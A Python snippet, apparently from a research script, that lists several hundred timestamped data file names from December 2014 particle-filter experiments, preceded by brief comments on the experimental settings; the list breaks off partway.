"step-3": "# this is for the 12/30/2015 experiments\n# varied over 1, 10, 25, 50, 100 repeat particles per particle\n# 10000 particles total per filter\n# bias is at 0.8 in both the \"real\" world (realWorld.cpp)\n\nfiles = ['data0Tue_Dec_30_20_37_34_2014.txt',\n'data0Tue_Dec_30_20_37_49_2014.txt',\n'data0Tue_Dec_30_20_38_04_2014.txt',\n'data0Tue_Dec_30_20_38_19_2014.txt',\n'data0Tue_Dec_30_20_38_34_2014.txt',\n'data0Tue_Dec_30_20_38_49_2014.txt',\n'data0Tue_Dec_30_20_39_04_2014.txt',\n'data0Tue_Dec_30_20_39_19_2014.txt',\n'data0Tue_Dec_30_20_39_34_2014.txt',\n'data0Tue_Dec_30_20_39_49_2014.txt',\n'data0Tue_Dec_30_20_40_04_2014.txt',\n'data0Tue_Dec_30_20_40_19_2014.txt',\n'data0Tue_Dec_30_20_40_34_2014.txt',\n'data0Tue_Dec_30_20_40_49_2014.txt',\n'data0Tue_Dec_30_20_41_04_2014.txt',\n'data0Tue_Dec_30_20_41_18_2014.txt',\n'data0Tue_Dec_30_20_41_34_2014.txt',\n'data0Tue_Dec_30_20_41_49_2014.txt',\n'data0Tue_Dec_30_20_42_04_2014.txt',\n'data0Tue_Dec_30_20_42_19_2014.txt',\n'data0Tue_Dec_30_20_42_34_2014.txt',\n'data0Tue_Dec_30_20_42_49_2014.txt',\n'data0Tue_Dec_30_20_43_04_2014.txt',\n'data0Tue_Dec_30_20_43_19_2014.txt',\n'data0Tue_Dec_30_20_43_34_2014.txt',\n'data0Tue_Dec_30_20_43_49_2014.txt',\n'data0Tue_Dec_30_20_44_04_2014.txt',\n'data0Tue_Dec_30_20_44_19_2014.txt',\n'data0Tue_Dec_30_20_44_34_2014.txt',\n'data0Tue_Dec_30_20_44_49_2014.txt',\n'data0Tue_Dec_30_20_45_04_2014.txt',\n'data0Tue_Dec_30_20_45_19_2014.txt',\n'data0Tue_Dec_30_20_45_34_2014.txt',\n'data0Tue_Dec_30_20_45_49_2014.txt',\n'data0Tue_Dec_30_20_46_04_2014.txt',\n'data0Tue_Dec_30_20_46_19_2014.txt',\n'data0Tue_Dec_30_20_46_34_2014.txt',\n'data0Tue_Dec_30_20_46_49_2014.txt',\n'data0Tue_Dec_30_20_47_04_2014.txt',\n'data0Tue_Dec_30_20_47_19_2014.txt',\n'data0Tue_Dec_30_20_47_34_2014.txt',\n'data0Tue_Dec_30_20_47_50_2014.txt',\n'data0Tue_Dec_30_20_48_05_2014.txt',\n'data0Tue_Dec_30_20_48_20_2014.txt',\n'data0Tue_Dec_30_20_48_35_2014.txt',\n'data0Tue_Dec_30_20_48_50_2014.txt',\n'data0Tue_Dec_30_20_49_05_2014.txt',\n'data0Tue_Dec_30_20_49_20_2014.txt',\n'data0Tue_Dec_30_20_49_35_2014.txt',\n'data0Tue_Dec_30_20_49_50_2014.txt',\n'data1Tue_Dec_30_20_50_05_2014.txt',\n'data1Tue_Dec_30_20_50_20_2014.txt',\n'data1Tue_Dec_30_20_50_35_2014.txt',\n'data1Tue_Dec_30_20_50_50_2014.txt',\n'data1Tue_Dec_30_20_51_05_2014.txt',\n'data1Tue_Dec_30_20_51_20_2014.txt',\n'data1Tue_Dec_30_20_51_35_2014.txt',\n'data1Tue_Dec_30_20_51_50_2014.txt',\n'data1Tue_Dec_30_20_52_05_2014.txt',\n'data1Tue_Dec_30_20_52_20_2014.txt',\n'data1Tue_Dec_30_20_52_35_2014.txt',\n'data1Tue_Dec_30_20_52_50_2014.txt',\n'data1Tue_Dec_30_20_53_05_2014.txt',\n'data1Tue_Dec_30_20_53_20_2014.txt',\n'data1Tue_Dec_30_20_53_35_2014.txt',\n'data1Tue_Dec_30_20_53_50_2014.txt',\n'data1Tue_Dec_30_20_54_04_2014.txt',\n'data1Tue_Dec_30_20_54_19_2014.txt',\n'data1Tue_Dec_30_20_54_34_2014.txt',\n'data1Tue_Dec_30_20_54_49_2014.txt',\n'data1Tue_Dec_30_20_55_04_2014.txt',\n'data1Tue_Dec_30_20_55_19_2014.txt',\n'data1Tue_Dec_30_20_55_34_2014.txt',\n'data1Tue_Dec_30_20_55_49_2014.txt',\n'data1Tue_Dec_30_20_56_04_2014.txt',\n'data1Tue_Dec_30_20_56_19_2014.txt',\n'data1Tue_Dec_30_20_56_34_2014.txt',\n'data1Tue_Dec_30_20_56_49_2014.txt',\n'data1Tue_Dec_30_20_57_04_2014.txt',\n'data1Tue_Dec_30_20_57_19_2014.txt',\n'data1Tue_Dec_30_20_57_33_2014.txt',\n'data1Tue_Dec_30_20_57_48_2014.txt',\n'data1Tue_Dec_30_20_58_03_2014.txt',\n'data1Tue_Dec_30_20_58_18_2014.txt',\n'data1Tue_Dec_30_20_58_33_2014.txt',\n'data1Tue_Dec_30_20_58_48_2014.txt',\n'data1Tue_Dec_30_20_59_03_2014.txt',\n'data1Tue_Dec_30_20_59_18_2014.txt',\n'data1Tue_Dec_30_20_59_33_2014.txt',\n'data1Tue_Dec_30_20_59_48_2014.txt',\n'data1Tue_Dec_30_21_00_03_2014.txt',\n'data1Tue_Dec_30_21_00_17_2014.txt',\n'data1Tue_Dec_30_21_00_32_2014.txt',\n'data1Tue_Dec_30_21_00_47_2014.txt',\n'data1Tue_Dec_30_21_01_02_2014.txt',\n'data1Tue_Dec_30_21_01_17_2014.txt',\n'data1Tue_Dec_30_21_01_32_2014.txt',\n'data1Tue_Dec_30_21_01_47_2014.txt',\n'data1Tue_Dec_30_21_02_03_2014.txt',\n'data1Tue_Dec_30_21_02_17_2014.txt',\n'data2Tue_Dec_30_21_02_32_2014.txt',\n'data2Tue_Dec_30_21_02_47_2014.txt',\n'data2Tue_Dec_30_21_03_02_2014.txt',\n'data2Tue_Dec_30_21_03_17_2014.txt',\n'data2Tue_Dec_30_21_03_32_2014.txt',\n'data2Tue_Dec_30_21_03_47_2014.txt',\n'data2Tue_Dec_30_21_04_02_2014.txt',\n'data2Tue_Dec_30_21_04_17_2014.txt',\n'data2Tue_Dec_30_21_04_31_2014.txt',\n'data2Tue_Dec_30_21_04_46_2014.txt',\n'data2Tue_Dec_30_21_05_01_2014.txt',\n'data2Tue_Dec_30_21_05_16_2014.txt',\n'data2Tue_Dec_30_21_05_31_2014.txt',\n'data2Tue_Dec_30_21_05_45_2014.txt',\n'data2Tue_Dec_30_21_06_00_2014.txt',\n'data2Tue_Dec_30_21_06_16_2014.txt',\n'data2Tue_Dec_30_21_06_31_2014.txt',\n'data2Tue_Dec_30_21_06_46_2014.txt',\n'data2Tue_Dec_30_21_07_01_2014.txt',\n'data2Tue_Dec_30_21_07_16_2014.txt',\n'data2Tue_Dec_30_21_07_31_2014.txt',\n'data2Tue_Dec_30_21_07_46_2014.txt',\n'data2Tue_Dec_30_21_08_01_2014.txt',\n'data2Tue_Dec_30_21_08_16_2014.txt',\n'data2Tue_Dec_30_21_08_30_2014.txt',\n'data2Tue_Dec_30_21_08_45_2014.txt',\n'data2Tue_Dec_30_21_09_01_2014.txt',\n'data2Tue_Dec_30_21_09_16_2014.txt',\n'data2Tue_Dec_30_21_09_31_2014.txt',\n'data2Tue_Dec_30_21_09_46_2014.txt',\n'data2Tue_Dec_30_21_10_00_2014.txt',\n'data2Tue_Dec_30_21_10_16_2014.txt',\n'data2Tue_Dec_30_21_10_31_2014.txt',\n'data2Tue_Dec_30_21_10_45_2014.txt',\n'data2Tue_Dec_30_21_11_00_2014.txt',\n'data2Tue_Dec_30_21_11_16_2014.txt',\n'data2Tue_Dec_30_21_11_31_2014.txt',\n'data2Tue_Dec_30_21_11_45_2014.txt',\n'data2Tue_Dec_30_21_12_01_2014.txt',\n'data2Tue_Dec_30_21_12_16_2014.txt',\n'data2Tue_Dec_30_21_12_31_2014.txt',\n'data2Tue_Dec_30_21_12_46_2014.txt',\n'data2Tue_Dec_30_21_13_00_2014.txt',\n'data2Tue_Dec_30_21_13_15_2014.txt',\n'data2Tue_Dec_30_21_13_31_2014.txt',\n'data2Tue_Dec_30_21_13_46_2014.txt',\n'data2Tue_Dec_30_21_14_00_2014.txt',\n'data2Tue_Dec_30_21_14_15_2014.txt',\n'data2Tue_Dec_30_21_14_30_2014.txt',\n'data2Tue_Dec_30_21_14_45_2014.txt',\n'data3Tue_Dec_30_21_15_00_2014.txt',\n'data3Tue_Dec_30_21_15_15_2014.txt',\n'data3Tue_Dec_30_21_15_29_2014.txt',\n'data3Tue_Dec_30_21_15_44_2014.txt',\n'data3Tue_Dec_30_21_15_59_2014.txt',\n'data3Tue_Dec_30_21_16_15_2014.txt',\n'data3Tue_Dec_30_21_16_30_2014.txt',\n'data3Tue_Dec_30_21_16_44_2014.txt',\n'data3Tue_Dec_30_21_16_59_2014.txt',\n'data3Tue_Dec_30_21_17_15_2014.txt',\n'data3Tue_Dec_30_21_17_29_2014.txt',\n'data3Tue_Dec_30_21_17_45_2014.txt',\n'data3Tue_Dec_30_21_18_00_2014.txt',\n'data3Tue_Dec_30_21_18_15_2014.txt',\n'data3Tue_Dec_30_21_18_29_2014.txt',\n'data3Tue_Dec_30_21_18_44_2014.txt',\n'data3Tue_Dec_30_21_18_59_2014.txt',\n'data3Tue_Dec_30_21_19_14_2014.txt',\n'data3Tue_Dec_30_21_19_29_2014.txt',\n'data3Tue_Dec_30_21_19_44_2014.txt',\n'data3Tue_Dec_30_21_19_59_2014.txt',\n'data3Tue_Dec_30_21_20_14_2014.txt',\n'data3Tue_Dec_30_21_20_29_2014.txt',\n'data3Tue_Dec_30_21_20_45_2014.txt',\n'data3Tue_Dec_30_21_21_00_2014.txt',\n'data3Tue_Dec_30_21_21_15_2014.txt',\n'data3Tue_Dec_30_21_21_30_2014.txt',\n'data3Tue_Dec_30_21_21_45_2014.txt',\n'data3Tue_Dec_30_21_21_59_2014.txt',\n'data3Tue_Dec_30_21_22_14_2014.txt',\n'data3Tue_Dec_30_21_22_29_2014.txt',\n'data3Tue_Dec_30_21_22_44_2014.txt',\n'data3Tue_Dec_30_21_22_58_2014.txt',\n'data3Tue_Dec_30_21_23_14_2014.txt',\n'data3Tue_Dec_30_21_23_28_2014.txt',\n'data3Tue_Dec_30_21_23_43_2014.txt',\n'data3Tue_Dec_30_21_23_58_2014.txt',\n'data3Tue_Dec_30_21_24_13_2014.txt',\n'data3Tue_Dec_30_21_24_28_2014.txt',\n'data3Tue_Dec_30_21_24_43_2014.txt',\n'data3Tue_Dec_30_21_24_58_2014.txt',\n'data3Tue_Dec_30_21_25_12_2014.txt',\n'data3Tue_Dec_30_21_25_28_2014.txt',\n'data3Tue_Dec_30_21_25_43_2014.txt',\n'data3Tue_Dec_30_21_25_58_2014.txt',\n'data3Tue_Dec_30_21_26_12_2014.txt',\n'data3Tue_Dec_30_21_26_27_2014.txt',\n'data3Tue_Dec_30_21_26_42_2014.txt',\n'data3Tue_Dec_30_21_26_57_2014.txt',\n'data3Tue_Dec_30_21_27_12_2014.txt',\n'data0Tue_Dec_30_21_27_52_2014.txt',\n'data0Tue_Dec_30_21_28_07_2014.txt',\n'data0Tue_Dec_30_21_28_22_2014.txt',\n'data0Tue_Dec_30_21_28_37_2014.txt',\n'data0Tue_Dec_30_21_28_51_2014.txt',\n'data0Tue_Dec_30_21_29_06_2014.txt',\n'data0Tue_Dec_30_21_29_21_2014.txt',\n'data0Tue_Dec_30_21_29_36_2014.txt',\n'data0Tue_Dec_30_21_29_51_2014.txt',\n'data0Tue_Dec_30_21_30_06_2014.txt',\n'data0Tue_Dec_30_21_30_21_2014.txt',\n'data0Tue_Dec_30_21_30_36_2014.txt',\n'data0Tue_Dec_30_21_30_50_2014.txt',\n'data0Tue_Dec_30_21_31_06_2014.txt',\n'data0Tue_Dec_30_21_31_21_2014.txt',\n'data0Tue_Dec_30_21_31_36_2014.txt',\n'data0Tue_Dec_30_21_31_51_2014.txt',\n'data0Tue_Dec_30_21_32_06_2014.txt',\n'data0Tue_Dec_30_21_32_21_2014.txt',\n'data0Tue_Dec_30_21_32_36_2014.txt',\n'data0Tue_Dec_30_21_32_51_2014.txt',\n'data0Tue_Dec_30_21_33_05_2014.txt',\n'data0Tue_Dec_30_21_33_20_2014.txt',\n'data0Tue_Dec_30_21_33_35_2014.txt',\n'data0Tue_Dec_30_21_33_50_2014.txt',\n'data0Tue_Dec_30_21_34_05_2014.txt',\n'data0Tue_Dec_30_21_34_20_2014.txt',\n'data0Tue_Dec_30_21_34_34_2014.txt',\n'data0Tue_Dec_30_21_34_49_2014.txt',\n'data0Tue_Dec_30_21_35_04_2014.txt',\n'data0Tue_Dec_30_21_35_20_2014.txt',\n'data0Tue_Dec_30_21_35_35_2014.txt',\n'data0Tue_Dec_30_21_35_49_2014.txt',\n'data0Tue_Dec_30_21_36_04_2014.txt',\n'data0Tue_Dec_30_21_36_19_2014.txt',\n'data0Tue_Dec_30_21_36_34_2014.txt',\n'data0Tue_Dec_30_21_36_49_2014.txt',\n'data0Tue_Dec_30_21_37_04_2014.txt',\n'data0Tue_Dec_30_21_37_19_2014.txt',\n'data0Tue_Dec_30_21_37_34_2014.txt',\n'data0Tue_Dec_30_21_37_49_2014.txt',\n'data0Tue_Dec_30_21_38_04_2014.txt',\n'data0Tue_Dec_30_21_38_18_2014.txt',\n'data0Tue_Dec_30_21_38_33_2014.txt',\n'data0Tue_Dec_30_21_38_48_2014.txt',\n'data0Tue_Dec_30_21_39_03_2014.txt',\n'data0Tue_Dec_30_21_39_18_2014.txt',\n'data0Tue_Dec_30_21_39_33_2014.txt',\n'data0Tue_Dec_30_21_39_48_2014.txt',\n'data0Tue_Dec_30_21_40_02_2014.txt',\n'data1Tue_Dec_30_21_40_18_2014.txt',\n'data1Tue_Dec_30_21_40_33_2014.txt',\n'data1Tue_Dec_30_21_40_48_2014.txt',\n'data1Tue_Dec_30_21_41_02_2014.txt',\n'data1Tue_Dec_30_21_41_17_2014.txt',\n'data1Tue_Dec_30_21_41_31_2014.txt',\n'data1Tue_Dec_30_21_41_46_2014.txt',\n'data1Tue_Dec_30_21_42_01_2014.txt',\n'data1Tue_Dec_30_21_42_16_2014.txt',\n'data1Tue_Dec_30_21_42_31_2014.txt',\n'data1Tue_Dec_30_21_42_46_2014.txt',\n'data1Tue_Dec_30_21_43_01_2014.txt',\n'data1Tue_Dec_30_21_43_16_2014.txt',\n'data1Tue_Dec_30_21_43_31_2014.txt',\n'data1Tue_Dec_30_21_43_46_2014.txt',\n'data1Tue_Dec_30_21_44_01_2014.txt',\n'data1Tue_Dec_30_21_44_15_2014.txt',\n'data1Tue_Dec_30_21_44_30_2014.txt',\n'data1Tue_Dec_30_21_44_46_2014.txt',\n'data1Tue_Dec_30_21_45_01_2014.txt',\n'data1Tue_Dec_30_21_45_15_2014.txt',\n'data1Tue_Dec_30_21_45_30_2014.txt',\n'data1Tue_Dec_30_21_45_45_2014.txt',\n'data1Tue_Dec_30_21_46_00_2014.txt',\n'data1Tue_Dec_30_21_46_15_2014.txt',\n'data1Tue_Dec_30_21_46_29_2014.txt',\n'data1Tue_Dec_30_21_46_44_2014.txt',\n'data1Tue_Dec_30_21_46_59_2014.txt',\n'data1Tue_Dec_30_21_47_14_2014.txt',\n'data1Tue_Dec_30_21_47_29_2014.txt',\n'data1Tue_Dec_30_21_47_44_2014.txt',\n'data1Tue_Dec_30_21_47_59_2014.txt',\n'data1Tue_Dec_30_21_48_13_2014.txt',\n'data1Tue_Dec_30_21_48_28_2014.txt',\n'data1Tue_Dec_30_21_48_43_2014.txt',\n'data1Tue_Dec_30_21_48_58_2014.txt',\n'data1Tue_Dec_30_21_49_13_2014.txt',\n'data1Tue_Dec_30_21_49_28_2014.txt',\n'data1Tue_Dec_30_21_49_43_2014.txt',\n'data1Tue_Dec_30_21_49_57_2014.txt',\n'data1Tue_Dec_30_21_50_13_2014.txt',\n'data1Tue_Dec_30_21_50_27_2014.txt',\n'data1Tue_Dec_30_21_50_42_2014.txt',\n'data1Tue_Dec_30_21_50_57_2014.txt',\n'data1Tue_Dec_30_21_51_12_2014.txt',\n'data1Tue_Dec_30_21_51_27_2014.txt',\n'data1Tue_Dec_30_21_51_42_2014.txt',\n'data1Tue_Dec_30_21_51_56_2014.txt',\n'data1Tue_Dec_30_21_52_11_2014.txt',\n'data1Tue_Dec_30_21_52_26_2014.txt',\n'data2Tue_Dec_30_21_52_40_2014.txt',\n'data2Tue_Dec_30_21_52_55_2014.txt',\n'data2Tue_Dec_30_21_53_10_2014.txt',\n'data2Tue_Dec_30_21_53_25_2014.txt',\n'data2Tue_Dec_30_21_53_40_2014.txt',\n'data2Tue_Dec_30_21_53_54_2014.txt',\n'data2Tue_Dec_30_21_54_09_2014.txt',\n'data2Tue_Dec_30_21_54_24_2014.txt',\n'data2Tue_Dec_30_21_54_39_2014.txt',\n'data2Tue_Dec_30_21_54_53_2014.txt',\n'data2Tue_Dec_30_21_55_08_2014.txt',\n'data2Tue_Dec_30_21_55_23_2014.txt',\n'data2Tue_Dec_30_21_55_38_2014.txt',\n'data2Tue_Dec_30_21_55_53_2014.txt',\n'data2Tue_Dec_30_21_56_08_2014.txt',\n'data2Tue_Dec_30_21_56_23_2014.txt',\n'data2Tue_Dec_30_21_56_37_2014.txt',\n'data2Tue_Dec_30_21_56_52_2014.txt',\n'data2Tue_Dec_30_21_57_07_2014.txt',\n'data2Tue_Dec_30_21_57_22_2014.txt',\n'data2Tue_Dec_30_21_57_37_2014.txt',\n'data2Tue_Dec_30_21_57_51_2014.txt',\n'data2Tue_Dec_30_21_58_06_2014.txt',\n'data2Tue_Dec_30_21_58_21_2014.txt',\n'data2Tue_Dec_30_21_58_35_2014.txt',\n'data2Tue_Dec_30_21_58_50_2014.txt',\n'data2Tue_Dec_30_21_59_05_2014.txt',\n'data2Tue_Dec_30_21_59_20_2014.txt',\n'data2Tue_Dec_30_21_59_34_2014.txt',\n'data2Tue_Dec_30_21_59_50_2014.txt',\n'data2Tue_Dec_30_22_00_05_2014.txt',\n'data2Tue_Dec_30_22_00_19_2014.txt',\n'data2Tue_Dec_30_22_00_34_2014.txt',\n'data2Tue_Dec_30_22_00_49_2014.txt',\n'data2Tue_Dec_30_22_01_03_2014.txt',\n'data2Tue_Dec_30_22_01_18_2014.txt',\n'data2Tue_Dec_30_22_01_33_2014.txt',\n'data2Tue_Dec_30_22_01_48_2014.txt',\n'data2Tue_Dec_30_22_02_03_2014.txt',\n'data2Tue_Dec_30_22_02_18_2014.txt',\n'data2Tue_Dec_30_22_02_32_2014.txt',\n'data2Tue_Dec_30_22_02_47_2014.txt',\n'data2Tue_Dec_30_22_03_02_2014.txt',\n'data2Tue_Dec_30_22_03_17_2014.txt',\n'data2Tue_Dec_30_22_03_31_2014.txt',\n'data2Tue_Dec_30_22_03_46_2014.txt',\n'data2Tue_Dec_30_22_04_01_2014.txt',\n'data2Tue_Dec_30_22_04_15_2014.txt',\n'data2Tue_Dec_30_22_04_30_2014.txt',\n'data2Tue_Dec_30_22_04_45_2014.txt',\n'data3Tue_Dec_30_22_05_00_2014.txt',\n'data3Tue_Dec_30_22_05_15_2014.txt',\n'data3Tue_Dec_30_22_05_30_2014.txt',\n'data3Tue_Dec_30_22_05_44_2014.txt',\n'data3Tue_Dec_30_22_06_00_2014.txt',\n'data3Tue_Dec_30_22_06_14_2014.txt',\n'data3Tue_Dec_30_22_06_29_2014.txt',\n'data3Tue_Dec_30_22_06_44_2014.txt',\n'data3Tue_Dec_30_22_06_59_2014.txt',\n'data3Tue_Dec_30_22_07_14_2014.txt',\n'data3Tue_Dec_30_22_07_29_2014.txt',\n'data3Tue_Dec_30_22_07_43_2014.txt',\n'data3Tue_Dec_30_22_07_58_2014.txt',\n'data3Tue_Dec_30_22_08_13_2014.txt',\n'data3Tue_Dec_30_22_08_28_2014.txt',\n'data3Tue_Dec_30_22_08_43_2014.txt',\n'data3Tue_Dec_30_22_08_57_2014.txt',\n'data3Tue_Dec_30_22_09_12_2014.txt',\n'data3Tue_Dec_30_22_09_27_2014.txt',\n'data3Tue_Dec_30_22_09_42_2014.txt',\n'data3Tue_Dec_30_22_09_57_2014.txt',\n'data3Tue_Dec_30_22_10_12_2014.txt',\n'data3Tue_Dec_30_22_10_26_2014.txt',\n'data3Tue_Dec_30_22_10_41_2014.txt',\n'data3Tue_Dec_30_22_10_56_2014.txt',\n'data3Tue_Dec_30_22_11_11_2014.txt',\n'data3Tue_Dec_30_22_11_25_2014.txt',\n'data3Tue_Dec_30_22_11_41_2014.txt',\n'data3Tue_Dec_30_22_11_56_2014.txt',\n'data3Tue_Dec_30_22_12_11_2014.txt',\n'data3Tue_Dec_30_22_12_26_2014.txt',\n'data3Tue_Dec_30_22_12_40_2014.txt',\n'data3Tue_Dec_30_22_12_55_2014.txt',\n'data3Tue_Dec_30_22_13_10_2014.txt',\n'data3Tue_Dec_30_22_13_25_2014.txt',\n'data3Tue_Dec_30_22_13_40_2014.txt',\n'data3Tue_Dec_30_22_13_55_2014.txt',\n'data3Tue_Dec_30_22_14_09_2014.txt',\n'data3Tue_Dec_30_22_14_24_2014.txt',\n'data3Tue_Dec_30_22_14_39_2014.txt',\n'data3Tue_Dec_30_22_14_53_2014.txt',\n'data3Tue_Dec_30_22_15_08_2014.txt',\n'data3Tue_Dec_30_22_15_23_2014.txt',\n'data3Tue_Dec_30_22_15_37_2014.txt',\n'data3Tue_Dec_30_22_15_52_2014.txt',\n'data3Tue_Dec_30_22_16_07_2014.txt',\n'data3Tue_Dec_30_22_16_22_2014.txt',\n'data3Tue_Dec_30_22_16_36_2014.txt',\n'data3Tue_Dec_30_22_16_51_2014.txt',\n'data3Tue_Dec_30_22_17_06_2014.txt',\n'data0Tue_Dec_30_22_17_47_2014.txt',\n'data0Tue_Dec_30_22_18_01_2014.txt',\n'data0Tue_Dec_30_22_18_16_2014.txt',\n'data0Tue_Dec_30_22_18_31_2014.txt',\n'data0Tue_Dec_30_22_18_46_2014.txt',\n'data0Tue_Dec_30_22_19_01_2014.txt',\n'data0Tue_Dec_30_22_19_15_2014.txt',\n'data0Tue_Dec_30_22_19_30_2014.txt',\n'data0Tue_Dec_30_22_19_45_2014.txt',\n'data0Tue_Dec_30_22_20_00_2014.txt',\n'data0Tue_Dec_30_22_20_15_2014.txt',\n'data0Tue_Dec_30_22_20_30_2014.txt',\n'data0Tue_Dec_30_22_20_44_2014.txt',\n'data0Tue_Dec_30_22_20_59_2014.txt',\n'data0Tue_Dec_30_22_21_14_2014.txt',\n'data0Tue_Dec_30_22_21_29_2014.txt',\n'data0Tue_Dec_30_22_21_44_2014.txt',\n'data0Tue_Dec_30_22_21_58_2014.txt',\n'data0Tue_Dec_30_22_22_13_2014.txt',\n'data0Tue_Dec_30_22_22_28_2014.txt',\n'data0Tue_Dec_30_22_22_43_2014.txt',\n'data0Tue_Dec_30_22_22_58_2014.txt',\n'data0Tue_Dec_30_22_23_12_2014.txt',\n'data0Tue_Dec_30_22_23_27_2014.txt',\n'data0Tue_Dec_30_22_23_42_2014.txt',\n'data0Tue_Dec_30_22_23_57_2014.txt',\n'data0Tue_Dec_30_22_24_12_2014.txt',\n'data0Tue_Dec_30_22_24_26_2014.txt',\n'data0Tue_Dec_30_22_24_41_2014.txt',\n'data0Tue_Dec_30_22_24_56_2014.txt',\n'data0Tue_Dec_30_22_25_11_2014.txt',\n'data0Tue_Dec_30_22_25_25_2014.txt',\n'data0Tue_Dec_30_22_25_41_2014.txt',\n'data0Tue_Dec_30_22_25_55_2014.txt',\n'data0Tue_Dec_30_22_26_10_2014.txt',\n'data0Tue_Dec_30_22_26_25_2014.txt',\n'data0Tue_Dec_30_22_26_39_2014.txt',\n'data0Tue_Dec_30_22_26_54_2014.txt',\n'data0Tue_Dec_30_22_27_09_2014.txt',\n'data0Tue_Dec_30_22_27_24_2014.txt',\n'data0Tue_Dec_30_22_27_39_2014.txt',\n'data0Tue_Dec_30_22_27_54_2014.txt',\n'data0Tue_Dec_30_22_28_09_2014.txt',\n'data0Tue_Dec_30_22_28_23_2014.txt',\n'data0Tue_Dec_30_22_28_38_2014.txt',\n'data0Tue_Dec_30_22_28_53_2014.txt',\n'data0Tue_Dec_30_22_29_08_2014.txt',\n'data0Tue_Dec_30_22_29_23_2014.txt',\n'data0Tue_Dec_30_22_29_37_2014.txt',\n'data0Tue_Dec_30_22_29_52_2014.txt',\n'data1Tue_Dec_30_22_30_07_2014.txt',\n'data1Tue_Dec_30_22_30_21_2014.txt',\n'data1Tue_Dec_30_22_30_36_2014.txt',\n'data1Tue_Dec_30_22_30_51_2014.txt',\n'data1Tue_Dec_30_22_31_06_2014.txt',\n'data1Tue_Dec_30_22_31_20_2014.txt',\n'data1Tue_Dec_30_22_31_35_2014.txt',\n'data1Tue_Dec_30_22_31_49_2014.txt',\n'data1Tue_Dec_30_22_32_04_2014.txt',\n'data1Tue_Dec_30_22_32_19_2014.txt',\n'data1Tue_Dec_30_22_32_34_2014.txt',\n'data1Tue_Dec_30_22_32_48_2014.txt',\n'data1Tue_Dec_30_22_33_03_2014.txt',\n'data1Tue_Dec_30_22_33_18_2014.txt',\n'data1Tue_Dec_30_22_33_33_2014.txt',\n'data1Tue_Dec_30_22_33_48_2014.txt',\n'data1Tue_Dec_30_22_34_03_2014.txt',\n'data1Tue_Dec_30_22_34_17_2014.txt',\n'data1Tue_Dec_30_22_34_32_2014.txt',\n'data1Tue_Dec_30_22_34_47_2014.txt',\n'data1Tue_Dec_30_22_35_01_2014.txt',\n'data1Tue_Dec_30_22_35_16_2014.txt',\n'data1Tue_Dec_30_22_35_31_2014.txt',\n'data1Tue_Dec_30_22_35_46_2014.txt',\n'data1Tue_Dec_30_22_36_01_2014.txt',\n'data1Tue_Dec_30_22_36_16_2014.txt',\n'data1Tue_Dec_30_22_36_30_2014.txt',\n'data1Tue_Dec_30_22_36_45_2014.txt',\n'data1Tue_Dec_30_22_37_00_2014.txt',\n'data1Tue_Dec_30_22_37_15_2014.txt',\n'data1Tue_Dec_30_22_37_30_2014.txt',\n'data1Tue_Dec_30_22_37_44_2014.txt',\n'data1Tue_Dec_30_22_37_59_2014.txt',\n'data1Tue_Dec_30_22_38_14_2014.txt',\n'data1Tue_Dec_30_22_38_28_2014.txt',\n'data1Tue_Dec_30_22_38_44_2014.txt',\n'data1Tue_Dec_30_22_38_58_2014.txt',\n'data1Tue_Dec_30_22_39_13_2014.txt',\n'data1Tue_Dec_30_22_39_28_2014.txt',\n'data1Tue_Dec_30_22_39_42_2014.txt',\n'data1Tue_Dec_30_22_39_57_2014.txt',\n'data1Tue_Dec_30_22_40_13_2014.txt',\n'data1Tue_Dec_30_22_40_27_2014.txt',\n'data1Tue_Dec_30_22_40_41_2014.txt',\n'data1Tue_Dec_30_22_40_56_2014.txt',\n'data1Tue_Dec_30_22_41_11_2014.txt',\n'data1Tue_Dec_30_22_41_26_2014.txt',\n'data1Tue_Dec_30_22_41_41_2014.txt',\n'data1Tue_Dec_30_22_41_56_2014.txt',\n'data1Tue_Dec_30_22_42_10_2014.txt',\n'data2Tue_Dec_30_22_42_25_2014.txt',\n'data2Tue_Dec_30_22_42_40_2014.txt',\n'data2Tue_Dec_30_22_42_54_2014.txt',\n'data2Tue_Dec_30_22_43_09_2014.txt',\n'data2Tue_Dec_30_22_43_24_2014.txt',\n'data2Tue_Dec_30_22_43_39_2014.txt',\n'data2Tue_Dec_30_22_43_53_2014.txt',\n'data2Tue_Dec_30_22_44_08_2014.txt',\n'data2Tue_Dec_30_22_44_23_2014.txt',\n'data2Tue_Dec_30_22_44_37_2014.txt',\n'data2Tue_Dec_30_22_44_52_2014.txt',\n'data2Tue_Dec_30_22_45_06_2014.txt',\n'data2Tue_Dec_30_22_45_21_2014.txt',\n'data2Tue_Dec_30_22_45_36_2014.txt',\n'data2Tue_Dec_30_22_45_50_2014.txt',\n'data2Tue_Dec_30_22_46_05_2014.txt',\n'data2Tue_Dec_30_22_46_20_2014.txt',\n'data2Tue_Dec_30_22_46_35_2014.txt',\n'data2Tue_Dec_30_22_46_50_2014.txt',\n'data2Tue_Dec_30_22_47_05_2014.txt',\n'data2Tue_Dec_30_22_47_20_2014.txt',\n'data2Tue_Dec_30_22_47_35_2014.txt',\n'data2Tue_Dec_30_22_47_49_2014.txt',\n'data2Tue_Dec_30_22_48_04_2014.txt',\n'data2Tue_Dec_30_22_48_19_2014.txt',\n'data2Tue_Dec_30_22_48_34_2014.txt',\n'data2Tue_Dec_30_22_48_49_2014.txt',\n'data2Tue_Dec_30_22_49_04_2014.txt',\n'data2Tue_Dec_30_22_49_19_2014.txt',\n'data2Tue_Dec_30_22_49_34_2014.txt',\n'data2Tue_Dec_30_22_49_49_2014.txt',\n'data2Tue_Dec_30_22_50_04_2014.txt',\n'data2Tue_Dec_30_22_50_19_2014.txt',\n'data2Tue_Dec_30_22_50_33_2014.txt',\n'data2Tue_Dec_30_22_50_48_2014.txt',\n'data2Tue_Dec_30_22_51_03_2014.txt',\n'data2Tue_Dec_30_22_51_18_2014.txt',\n'data2Tue_Dec_30_22_51_32_2014.txt',\n'data2Tue_Dec_30_22_51_47_2014.txt',\n'data2Tue_Dec_30_22_52_02_2014.txt',\n'data2Tue_Dec_30_22_52_16_2014.txt',\n'data2Tue_Dec_30_22_52_31_2014.txt',\n'data2Tue_Dec_30_22_52_46_2014.txt',\n'data2Tue_Dec_30_22_53_01_2014.txt',\n'data2Tue_Dec_30_22_53_16_2014.txt',\n'data2Tue_Dec_30_22_53_31_2014.txt',\n'data2Tue_Dec_30_22_53_45_2014.txt',\n'data2Tue_Dec_30_22_54_00_2014.txt',\n'data2Tue_Dec_30_22_54_15_2014.txt',\n'data2Tue_Dec_30_22_54_29_2014.txt',\n'data3Tue_Dec_30_22_54_44_2014.txt',\n'data3Tue_Dec_30_22_54_59_